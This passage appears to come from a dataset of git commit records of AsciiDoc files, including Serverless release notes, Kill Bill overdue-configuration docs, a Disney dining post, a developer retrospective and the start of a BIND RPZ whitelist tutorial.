0.18.2.\n* {ServerlessProductName} uses Knative Eventing 0.18.6.\n* {ServerlessProductName} now uses Kourier 0.18.0.\n* {ServerlessProductName} now uses Knative `kn` CLI 0.18.4.\n* {ServerlessProductName} now uses Knative Kafka 0.18.0.\n\n[id=\"fixed-issues-1-12-0_{context}\"]\n== Fixed issues\n\n* In previous versions, if you used a ping source with OpenShift Serverless, after you uninstalled and deleted all other Knative Eventing components, the `pingsource-jobrunner` deployment was not deleted. This issue is now fixed, and the `pingsource-jobrunner` deployment has been renamed to `pingsource-mt-adapter`.\n* In previous versions, deleting a sink before you delete the `SinkBinding` resource connected to it caused the resource deletion to hang. This issue is now fixed.\n\n[id=\"known-issues-1-12-0_{context}\"]\n== Known issues\n\n* Using the `eventing.knative.dev\/scope: namespace` annotation for the `KafkaChannel` objects is not supported.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * serverless\/release-notes.adoc\n\n[id=\"serverless-rn-1-12-0_{context}\"]\n\n= Release Notes for Red Hat {ServerlessProductName} 1.12.0\n\n[id=\"new-features-1-12-0_{context}\"]\n== New features\n\n* {ServerlessProductName} now uses Knative Serving 0.18.2.\n* {ServerlessProductName} uses Knative Eventing 0.18.6.\n* {ServerlessProductName} now uses Kourier 0.18.0.\n* {ServerlessProductName} now uses Knative `kn` CLI 0.18.4.\n* {ServerlessProductName} now uses Knative Kafka 0.18.0.\n\n[id=\"fixed-issues-1-12-0_{context}\"]\n== Fixed issues\n\n[id=\"known-issues-1-12-0_{context}\"]\n== Known issues\n\n* Using the `eventing.knative.dev\/scope: namespace` annotation for the `KafkaChannel` objects is not supported.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9efece941db53133438f1669da61b37eef2cfb8d","subject":"clarify Tag Inclusions\/Exclusion","message":"clarify Tag Inclusions\/Exclusion\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/includes\/overdue.adoc","new_file":"userguide\/kaui\/includes\/overdue.adoc","new_contents":":icons: font\n:imagesdir: C:\\_My Documents\\FlowWritingLLC\\Projects\\Kill Bill\\Documentation\\killbill-docs\\userguide\\assets\\img\\kaui\n\n=== Overview\n\nKaui lets you configure basic settings for how the system behaves when an account is overdue. For overdue configuration, you define:\n\n* The various states that the account must go through\n* The change in users' entitlements when the account is transitioned from one state to the other\n* The period after which the state is re-evaluated\n\nThese three pieces of information make up the _overdue flow_.\n\nOverdue configuration applies at the tenant level. However you can also configure overdue flows for the _global_ Kill Bill system.\n\nIn Kaui, overdue configuration is a subset of the full overdue configuration settings. 
For more information on the full configuration settings and global settings, see the https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_].\n\nSee the following sections to create overdue (dunning) flows for a tenant:\n\n[cols=\"1,1\"]\n[frame=none]\n[grid=none]\n|===\n\na| * <<View Overdue Configuration,View overdue configuration>>\n* <<Create Overdue Flows,Create overdue flows>>\n* <<Upload an XML Overdue Configuration File,Upload an XML overdue configuration file>>\n\na| * <<View Overdue Configuration as XML,View overdue configuration as XML>>\n* <<Delete Overdue Flows,Delete overdue flows>>\n\n|===\n\n==== Additional Overdue Resources\n\n* https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-overdue[\"Overdue\"] section in the _Subscription Guide_.\n* https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_]\n\n=== View Overdue Configuration\n\nIf any overdue (dunning) flows are configured, you can see them on the Overdue Show tab at the bottom of the Tenant Configuration page. To get there:\n\n. Click on your username and tenant name in the upper right corner:\n+\nimage::Users-SelectTenantName.png[width=650,align=\"center\"]\n+\nKaui displays the Tenant Configuration page.\n+\n. Scroll down and click on the Overdue Show tab:\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n\n=== Create Overdue Flows\n\nThe following steps explain how to set up overdue flows (i.e., actions) for the tenant.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *+ New Overdue States*. Kaui opens the fields for editing:\n+\nimage::OverdueConfig-BlankFields.png[width=850,align=\"center\"]\n+\n. Fill in the fields for the current row. For field information, see the <<Overdue Configuration Field Descriptions>> table.\n+\n. To add another overdue configuration row, click *+ new overdue states*.\n+\nimage::Overdue-Select-NewOverdueState.png[width=450,align=\"center\"]\n+\n. When you are done adding configuration rows, click the *Save* button. Kaui displays a success message at the top of the screen and displays the new overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowFlows.png[width=850,align=\"center\"]\n\n[NOTE]\n*Note:* To edit an existing overdue flow, on the Overdue Show tab, click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*. This opens the overdue configuration fields in edit mode.\n\n=== Overdue Configuration Field Descriptions\n\n[cols=\"1,3\"]\n|===\n^|Field ^|Description\n\n| Name\n| The name assigned to the overdue state.\n\n| External Message\n| Message text that other plugins, when listening for overdue events, can retrieve and display to the user. (_Optional_)\n\n| Block Subscription Changes\n| If set to `true`, the customer _cannot_ make plan changes to the subscription in this overdue flow. If set to `false`, the customer is allowed to make changes.\n\n| Subscription Cancellation\na| Select the option that describes how Kill Bill behaves regarding a cancellation in this overdue flow:\n\n* `NONE`: Kill Bill ignores this field, and the subscription is not cancelled.\n\n* `POLICY_NONE`: ??? _Maybe some to do with the default cancellation policy in the catalog? 
Not sure..._\n\n* `POLICY_IMMEDIATE_POLICY`: Cancels the subscription immediately and applies a partial credit to the\naccount based on how much of the service has been consumed.\n\n* `POLICY_END_OF_TERM`: Cancels the subscription at the end of the billing period with no refund to\nthe customer (i.e., no proration).\n\n| Days Since Earliest Unpaid Invoice\n| Specifies how many days should pass after the last unpaid invoice before initiating this overdue flow.\n\n| Tag Inclusion\na| Specifies that the overdue flow will occur if the account has a system (control) tag matching the one selected here. To disregard tag inclusion for this overdue flow, leave as the default `NONE` setting.\n\n* `AUTO_PAY_OFF`\n* `AUTO_INVOICING_OFF`\n* `OVERDUE_ENFORCEMENT_OFF`\n* `MANUAL_PAY`\n* `TEST`\n* `PARTNER`\n\nFor a description of system tags, see the https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-tag[\"Tags\"] section of the _Subscription Guide_.\n\n| Tag Exclusion\n| Specifies that the overdue flow will occur if the account has NO system (control) tags matching the one selected here. To disregard tag exclusion for this overdue flow, leave as the default `NONE` setting.\n\n| Number of Unpaid Invoices\n| Specifies that the overdue flow will occur if the number of unpaid invoices equals or exceeds the specified value.\n\n| Total Unpaid Invoice Balance\n| Specifies that the overdue flow will occur if the total unpaid invoice balance equals or exceeds the specified value.\n\n|===\n\n=== Upload an XML Overdue Configuration File\n\nKill Bill overdue configuration is stored in XML format. This section explains how to upload an XML file that contains the overdue configuration.\n\n[NOTE]\n*Note*: You cannot edit a raw overdue configuration XML file in Kaui.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *Enable Advanced Configuration (Upload XML)*. Kaui displays an upload screen:\n+\nimage::Overdue-AdvancedConfigUpload.png[width=450,align=\"center\"]\n+\n. Click the *Choose File* button, locate the XML file, and select it.\n+\nOnce you have selected the file, Kaui displays the filename next to the *Choose File* button.\n+\nimage::Overdue-AdvancedConfigUpload-File.png[width=450,align=\"center\"]\n+\n. Click the *Upload* button.\n+\nIf the upload is successful, Kaui displays a success message at the top of the screen and displays the overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowUpload.png[width=850,align=\"center\"]\n\n=== View Overdue Configuration as XML\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click *View Overdue XML* to the right of the plus sign ( image:i_PlusGreen.png[] ). Kaui displays the raw XML (uneditable in this view).\n+\n. To return to Kaui, click the Back arrow button of your browser.\n\n=== Delete Overdue Flows\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen.\n+\n. 
Click the red X ( image:i_RedX.png[] ) to the right of every configuration row you want to delete.\n+\nimage::Overdue-Select-Delete.png[width=850,align=\"center\"]\n+\n. Click the *Save* button.\n+\nKaui removes the overdue configuration row(s) from the Overdue Show tab and displays a delete confirmation message.\n","old_contents":":icons: font\n:imagesdir: C:\\_My Documents\\FlowWritingLLC\\Projects\\Kill Bill\\Documentation\\killbill-docs\\userguide\\assets\\img\\kaui\n\n=== Overview\n\nKaui lets you configure basic settings for how the system behaves when an account is overdue. For overdue configuration, you define:\n\n* The various states that the account must go through\n* The change in users' entitlements when the account is transitioned from one state to the other\n* The period after which the state is re-evaluated\n\nThese three pieces of information make up the _overdue flow_.\n\nOverdue configuration applies at the tenant level. However you can also configure overdue flows for the _global_ Kill Bill system.\n\nIn Kaui, overdue configuration is a subset of the full overdue configuration settings. For more information on the full configuration settings and global settings, see the https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_].\n\nSee the following sections to create overdue (dunning) flows for a tenant:\n\n[cols=\"1,1\"]\n[frame=none]\n[grid=none]\n|===\n\na| * <<View Overdue Configuration,View overdue configuration>>\n* <<Create Overdue Flows,Create overdue flows>>\n* <<Upload an XML Overdue Configuration File,Upload an XML overdue configuration file>>\n\na| * <<View Overdue Configuration as XML,View overdue configuration as XML>>\n* <<Delete Overdue Flows,Delete overdue flows>>\n\n|===\n\n==== Additional Overdue Resources\n\n* https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-overdue[\"Overdue\"] section in the _Subscription Guide_.\n* https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_]\n\n=== View Overdue Configuration\n\nIf any overdue (dunning) flows are configured, you can see them on the Overdue Show tab at the bottom of the Tenant Configuration page. To get there:\n\n. Click on your username and tenant name in the upper right corner:\n+\nimage::Users-SelectTenantName.png[width=650,align=\"center\"]\n+\nKaui displays the Tenant Configuration page.\n+\n. Scroll down and click on the Overdue Show tab:\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n\n=== Create Overdue Flows\n\nThe following steps explain how to set up overdue flows (i.e., actions) for the tenant.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *+ New Overdue States*. Kaui opens the fields for editing:\n+\nimage::OverdueConfig-BlankFields.png[width=850,align=\"center\"]\n+\n. Fill in the fields for the current row. For field information, see the <<Overdue Configuration Field Descriptions>> table.\n+\n. To add another overdue configuration row, click *+ new overdue states*.\n+\nimage::Overdue-Select-NewOverdueState.png[width=450,align=\"center\"]\n+\n. When you are done adding configuration rows, click the *Save* button. 
Kaui displays a success message at the top of the screen and displays the new overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowFlows.png[width=850,align=\"center\"]\n\n[NOTE]\n*Note:* To edit an existing overdue flow, on the Overdue Show tab, click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*. This opens the overdue configuration fields in edit mode.\n\n=== Overdue Configuration Field Descriptions\n\n[cols=\"1,3\"]\n|===\n^|Field ^|Description\n\n| Name\n| The name assigned to the overdue state.\n\n| External Message\n| Message text that other plugins, when listening for overdue events, can retrieve and display to the user. (_Optional_)\n\n| Block Subscription Changes\n| If set to `true`, the customer _cannot_ make plan changes to the subscription in this overdue flow. If set to `false`, the customer is allowed to make changes.\n\n| Subscription Cancellation\na| Select the option that describes how Kill Bill behaves regarding a cancellation in this overdue flow:\n\n* `NONE`: The subscription is not cancelled.\n\n* `POLICY_NONE`: ??? _Maybe some to do with the default cancellation policy in the catalog? Not sure..._\n\n* `POLICY_IMMEDIATE_POLICY`: Cancels the subscription immediately and applies a partial credit to the\naccount based on how much of the service has been consumed.\n\n* `END_OF_TERM`: Cancels the subscription at the end of the billing period with no refund to\nthe customer (i.e., no proration).\n\n| Days Since Earliest Unpaid Invoice\n| Specifies how many days should pass after the last unpaid invoice before initiating this overdue flow.\n\n| Tag Inclusion\na| Specifies that the overdue flow will occur if the account is tagged with one of the selected system (control) tags. To disregard tag inclusion for this overdue flow, leave as the default `NONE` setting.\n\n* `AUTO_PAY_OFF`\n* `AUTO_INVOICING_OFF`\n* `OVERDUE_ENFORCEMENT_OFF`\n* `MANUAL_PAY`\n* `TEST`\n* `PARTNER`\n\nFor a description of system tags, see the https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-tag[\"Tags\"] section of the _Subscription Guide_.\n\n| Tag Exclusion\n| Specifies that the overdue flow will occur if the account is _not_ tagged with one of the selected system (control) tags. (See tags information above.) To disregard tag exclusion for this overdue flow, leave as the default `NONE` setting.\n\n| Number of Unpaid Invoices\n| Specifies that the overdue flow will occur if the number of unpaid invoices equals or exceeds the specified value.\n\n| Total Unpaid Invoice Balance\n| Specifies that the overdue action will occur if the total unpaid invoice balance equals or exceeds the specified value.\n\n|===\n\n=== Upload an XML Overdue Configuration File\n\nKill Bill overdue configuration is stored in XML format. This section explains how to upload an XML file that contains the overdue configuration.\n\n[NOTE]\n*Note*: You cannot edit a raw overdue configuration XML file in Kaui.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *Enable Advanced Configuration (Upload XML)*. Kaui displays an upload screen:\n+\nimage::Overdue-AdvancedConfigUpload.png[width=450,align=\"center\"]\n+\n. 
Click the *Choose File* button, locate the XML file, and select it.\n+\nOnce you have selected the file, Kaui displays the filename next to the *Choose File* button.\n+\nimage::Overdue-AdvancedConfigUpload-File.png[width=450,align=\"center\"]\n+\n. Click the *Upload* button.\n+\nIf the upload is successful, Kaui displays a success message at the top of the screen and displays the overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowUpload.png[width=850,align=\"center\"]\n\n=== View Overdue Configuration as XML\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click *View Overdue XML* to the right of the plus sign ( image:i_PlusGreen.png[] ). Kaui displays the raw XML (uneditable in this view).\n+\n. To return to Kaui, click the Back arrow button of your browser.\n\n=== Delete Overdue Flows\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen.\n+\n. Click the red X ( image:i_RedX.png[] ) to the right of every configuration row you want to delete.\n+\nimage::Overdue-Select-Delete.png[width=850,align=\"center\"]\n+\n. Click the *Save* button.\n+\nKaui removes the overdue configuration row(s) from the Overdue Show tab and displays a delete confirmation message.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"58f71484184425290c73306e9259181003a06cd8","subject":"Update 2016-04-06-Early-Breakfast-in-Fantasyland.adoc","message":"Update 2016-04-06-Early-Breakfast-in-Fantasyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-06-Early-Breakfast-in-Fantasyland.adoc","new_file":"_posts\/2016-04-06-Early-Breakfast-in-Fantasyland.adoc","new_contents":"= Early Breakfast in Fantasyland\n:hp-tags: Disney World, Magic Kingdom, News\n\nimage::covers\/7DMT_Doc.jpg[caption=\"Doc in the Seven Dwarfs Mine Train\"]\n\nOne of the biggest decisions you'll make when planning a Disney World vacation is whether to eat a good breakfast before going to the parks or going straight to the parks to be the first in line for some of your favorite attractions. Now you can choose both if you take advantage of \"Disney Early Morning Magic\".\n\nOn select mornings from 7:45-10:00am, a very limited number of guests will be the first to enter the Magic Kingdom and Fantasyland. At _Pinocchio Village Haus_, you can enjoy a breakfast that includes pastries, fruits, scrambled eggs, waffles, bacon, sausage, and much more. And before the crowds get too heavy, you'll have quick access to _Peter Pan's Flight_, _Seven Dwarfs Mine Train_, and _The Many Adventures of Winnie the Pooh_. \n\nThis special early morning access to Fantasyland will cost $69 for adults and $59 for children (ages 3-9) in addition to regular park admission. It appears that it will be offered on most Tuesday and Saturday mornings starting April 26th. If this is something you think you might want to try out, you can read more about it and check for availability by clicking https:\/\/disneyworld.disney.go.com\/dining\/early-morning-magic[here].\n\nIt's important to understand that although this event runs from 7:45-10:00am, the Magic Kingdom still opens at 9:00am on those days. 
So participating guests will only have exclusive access to Fantasyland for an hour and 15 minutes (unless they plan to keep Fantasyland closed to regular guests until 10:00am--which is unlikely). Therefore, we're undecided if breakfast plus quick access to those three rides in such a short period of time justifies the $69\/person price tag. In comparison, breakfast at _Cinderella's Royal Table_ is roughly $60 for adults and $36 for children, which includes the experience of dining in the castle, albeit without quick access to 3 Fantasyland attractions.\n\nWhat do you think? Does \"Disney Early Morning Magic\" seem like something you'd want to try? Leave us a comment and let us know.\n","old_contents":"= Breakfast in Fantasyland\n:hp-tags: Disney World, Magic Kingdom, News\n\nimage::covers\/7DMT_Doc.jpg[caption=\"Doc in the Seven Dwarfs Mine Train\"]\n\nOne of the biggest decisions you'll make when planning a Disney World vacation is whether to eat a good breakfast before going to the parks or going straight to the parks to be the first in line for some of your favorite attractions. Now you can choose both if you take advantage of \"Disney Early Morning Magic\".\n\nOn select mornings from 7:45-10:00am, a very limited number of guests will be the first to enter the Magic Kingdom and Fantasyland. At _Pinocchio Village Haus_, you can enjoy a breakfast that includes pastries, fruits, scrambled eggs, waffles, bacon, sausage, and much more. And before the crowds get too heavy, you'll have quick access to _Peter Pan's Flight_, _Seven Dwarfs Mine Train_, and _The Many Adventures of Winnie the Pooh_. \n\nThis special early morning access to Fantasyland will cost $69 for adults and $59 for children (ages 3-9) in addition to regular park admission. It appears that it will be offered on most Tuesday and Saturday mornings starting April 26th. If this is something you think you might want to try out, you can read more about it and check for availability by clicking https:\/\/disneyworld.disney.go.com\/dining\/early-morning-magic[here].\n\nIt's important to understand that although this event runs from 7:45-10:00am, the Magic Kingdom still opens at 9:00am on those days. So participating guests will only have exclusive access to Fantasyland for an hour and 15 minutes (unless they plan to keep Fantasyland closed to regular guests until 10:00am--which is unlikely). Therefore, we're undecided if breakfast plus quick access to those three rides in such a short period of time justifies the $69\/person price tag. In comparison, breakfast at _Cinderella's Royal Table_ is roughly $60 for adults and $36 for children, which includes the experience of dining in the castle, albeit without quick access to 3 Fantasyland attractions.\n\nWhat do you think? Does \"Disney Early Morning Magic\" seem like something you'd want to try? 
Leave us a comment and let us know.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9b43d7e2e0bfb14cad504f93bc0d3acf6dc665cf","subject":"Update 2016-05-20-Assumptions-driven-development.adoc","message":"Update 2016-05-20-Assumptions-driven-development.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_contents":"= Assumptions driven-development\n:hp-image: \/covers\/assumptions-driven-development.jpeg\n:hp-tags: learning, development\n:hp-alt-title: Assumptions driven-development\n:published_at: 2016-05-20\n:my-twitter-link: https:\/\/twitter.com\/mikealdo007[@mikealdo007]\n:yegor-debugging-link: http:\/\/www.yegor256.com\/2016\/02\/09\/are-you-still-debugging.html[Yegor]\n:pomodoro-link: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[Pomodoro's]\n:self-retro-link: https:\/\/mikealdo.github.io\/2016\/03\/18\/Self-retrospective-increases-happiness-of-life.html[self-retrospective]\n:cover-link: https:\/\/unsplash.com\/photos\/ZSvlTa6yARw[Tomas Salas | unsplash.com]\n\nIt\u2019s quite hard to admit, but recently I almost entirely failed with the initial design and implementation of one of the features needed in the software I am currently working on. It\u2019s even more challenging when I think of myself as a pretty established, experienced developer. This \"almost fail\" leads me to the fact that there is always something new to learn and there is always a reason to ask questions, even about the easiest problems.\n\n== Assumptions are bad\nAll this story, and throwing away my two-week work (almost all of it), started with a lack of communication and a vague description of the task. Even when I asked some questions, they were answered a little bit vaguely and without a thorough understanding on the respondent's side. Also, the documentation was very broad and almost only about the product itself, with not many technical details about the affected area. And documentation inside the codebase? Just hard-to-use or undocumented code. So I started to think about \u201chow this and this part of the software works\u201d on my own by looking at the documentation, the code, and the test codebase, and (of course) by debugging. By the way, I agree with {yegor-debugging-link}: if you are debugging something, it is a sign that something is wrong.\n\n== Fail trajectory\nI have collected all the errors below:\n\n* *Fail 1:* As the codebase was pretty large, I created my own assumptions and my own mind maps about the parts of the architecture.\n** Then I was trying to invent a solution fitting *my* understanding of the code. 
Ultimately wrong.\n* *Fail 2:* I was presuming that I was expected to understand all the code with only slight help from others, as they seemed to be very busy.\n** And probably because my ego was big enough to fight the task alone.\n* *Fail 3:* I was convinced too early that I could come up with a reasonable solution, and I immediately started working on the proof of concept (POC).\n* *Fail 4:* After I designed the POC and proved that it might work, I was not diligent enough to discuss with a broad audience whether the solution fits the architecture, further development, or future features.\n* *Fail 5:* As my POC confirmed that it could work, I started working on implementation details in one part of the application before scanning all of the affected areas.\n** And not surprisingly, in two code areas it was very hard to incorporate my design, and the design turned out to be wrong for these parts of the codebase.\n* *Fail 6:* After some pressure had come, I avoided working in {pomodoro-link} style to achieve \u201cbetter\u201d productivity, and after a whole day of developing I was just so overwhelmed.\n** The big picture immediately went away. Productivity was even worse. My personal feeling was bad as well. One positive point is that I realized quite early that it wasn\u2019t working and returned to Pomodoro's after one and a half days. At least something.\n* *Fail 7:* I didn\u2019t make an analysis of all the technologies used in the project and how they could be replaced or utilized better.\n* *Fail 8:* Code review was not done periodically on small amounts of code but on the code produced after two weeks of development.\n\n== How it ended?\nIn the end, it was a success. But it took more than three weeks of work in addition to the two weeks spent on the wrong implementation. In my opinion, the success started mainly with my personal {self-retro-link}. I have been doing it for months, and after the second week, revisiting all the work done, I realized that I wasn't able to deliver something feasible in two weeks, and that's just wrong. Then I was communicating with others more thoroughly; I was organizing sessions with an open development environment, and I was deeply analyzing all the suggestions. I returned to the implementation after three days of communication and meetings, with clear steps defined to achieve the goal of my task.\n\n== Suggestion for all developers\nIf you are self-reflective enough, you can recognize some of the fails above. The point is to realize such a fail fast, to avoid unnecessary work, thrown-away code, and frustration. You are not alone and not working alone; there is always someone to ask, to discuss possible solutions with deeply, and so to get rid of the fails mentioned above. 
Be a more experienced and mature developer!\n\n*P.S.* If you enjoyed this post, you can follow me on {my-twitter-link} to stay in touch with my articles and other thoughts.\n\n*P.S.2* Cover image by {cover-link}.","old_contents":"= Assumptions driven-development\n:hp-image: \/covers\/assumptions-driven-development.jpeg\n:hp-tags: learning, development\n:hp-alt-title: Assumptions driven-development\n:published_at: 2016-05-20\n:my-twitter-link: https:\/\/twitter.com\/mikealdo007[@mikealdo007]\n:yegor-debugging-link: http:\/\/www.yegor256.com\/2016\/02\/09\/are-you-still-debugging.html[Yegor]\n:pomodoro-link: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[Pomodoro's]\n:self-retro-link: https:\/\/mikealdo.github.io\/2016\/03\/18\/Self-retrospective-increases-happiness-of-life.html[self-retrospective]\n:cover-link: https:\/\/unsplash.com\/photos\/ZSvlTa6yARw[Tomas Salas | unsplash.com]\n\nIt\u2019s quite hard to admit, but recently I have almost entirely failed with initial design and implementation of one of the features needed in software on which I am currently working. It\u2019s even more challenging when I have a meaning about myself as pretty established, experienced developer. This \"almost fail\" leads to me to the fact, that there is always something new to learn and there is still need to open question even for the easiest problems.\n\n== Assumptions are bad\nAll this story and throwing away my two-week work (almost all) started with the lack of communication and vague description of the task. Even when I have opened some questions, they were answered a little bit vaguely and without the thorough understanding of respondent. Also, documentation was very broad and almost only about the product itself, not so many technical details about affected area. And documentation inside codebase? Just hard to use or undocumented code. So I started to think about \u201chow this and this part of software works\u201d on my own by looking at documentation and to the code, test codebase and (of course) debugging. By the way, I agree with {yegor-debugging-link}, if you are debugging something, it is a sign that is something wrong.\n\n== Fail trajectory\nI have collected all errors bellow:\n\n* *Fail 1:* As the codebase were pretty large I have created own assumptions, own mind maps about the parts of the architecture.\n** Then I was trying to invent solution passing to *my* understandings of code. 
Ultimately wrong.\n* *Fail 2:* I was presuming that is expected to understand all the code with the only slight help of others as others seemed to be very busy.\n** And probably as my ego was big enough for fighting the task alone.\n* *Fail 3:* I was too early convinced that I can come with the reasonable solution and immediately start working on the proof of concept (POC).\n* *Fail 4:* After I designed the POC and proven that might work I was not diligent enough to discuss my solution with a broad audience if the solution fits the architecture, further development or future features.\n* *Fail 5:* As my POC confirmed that it can work I started working on implementation details in one part of the application before scanning all of the affected areas.\n** And not surprisingly in two code areas, it was very hard and wrong by my design to incorporate my design into these parts of the codebase.\n* *Fail 6:* After some pressure had come, I avoided working in {pomodoro-link} style to achieve \u201cbetter\u201d productivity and after a whole day of developing I was just so overwhelmed.\n** The big picture immediately went away. Productivity was even worse. My personal feeling was bad as well. One positive point is that I realized that it\u2019s not working quite early and returned to Pomodoro's after one and half day. At least something.\n* *Fail 7:* I didn\u2019t make an analysis of all technologies used in the project and how can be replaced or utilized better.\n* *Fail 8:* Code review was not done periodically on small amount of code but on the code produced after two-weeks development.\n\n== How it ended?\nOn the end, it was a success. But more than three weeks work in addition to two weeks spent on the wrong implementation. Beginning of the success started mainly due to my personal {self-retro-link} by my opinion. I am doing it for more than for months and after the second week and revisiting all the work done, I realized that I wasn't able to deliver something feasible in two weeks, and it's just wrong. Then I was communicating with others more thorougly; I was organizing sessions with opened development environment, and I was deeply analyzing all the suggestions. I returned to the implementation after three days of communication, meetings and with clear steps defined to achieve the goal of my task.\n\n== Suggestion for all developers\nIf you are self-reflexive enough, you can reckognize one of the fail above. The point is to realize this fail fast to avoid unnecessary work, throwned code, and frustration. You are not alone and not working alone, there is always someone to ask, to discuss possible solutions deeply and getting rid of fails mentioned above. 
Be more experienced and mature developer!\n\n*P.S.* If you enjoyed this post, you can follow me on {my-twitter-link} to stay in touch with my articles and other thoughts.\n*P.S.2* Cover image by {cover-link}.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e0e2c9744a6559a0237e9bd1a7813010bcf6de5e","subject":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","message":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_contents":"= DNS Whitelist in BIND with RPZ\n :hp-tags: DNS, Filtering, Firewall, Security\n\nRestricting DNS queries to a specific list of domains.\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous security and privacy issues with smart TVs of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So being predictably paranoid I immediately blocked the TV's IP address on my router to stop it getting to the internet.\n\nAs it turns out however, the built-in Netflix app on the TV is my only option for 4k Netflix (my HTPC was out due to not having a Kaby Lake chip).\n\nSo I found myself in a situation where I needed to allow the TV to get out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit its access to just Netflix? I initially tried an IP-based ACL on the router, but there were some issues with that, so I began to wonder: was there a DNS-based approach I could take?\n\n\n=== Enter DNS RPZ\n\nI am relatively familiar with https:\/\/www.isc.org\/downloads\/bind[ISC Bind] having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up, however I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n=== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then configured a 'response-policy' block in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). This lists two RPZ zones which are used to define what queries to filter. The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authoritative master for these zones, similar to a standard zone, although with \"allow-query\" set to none. 
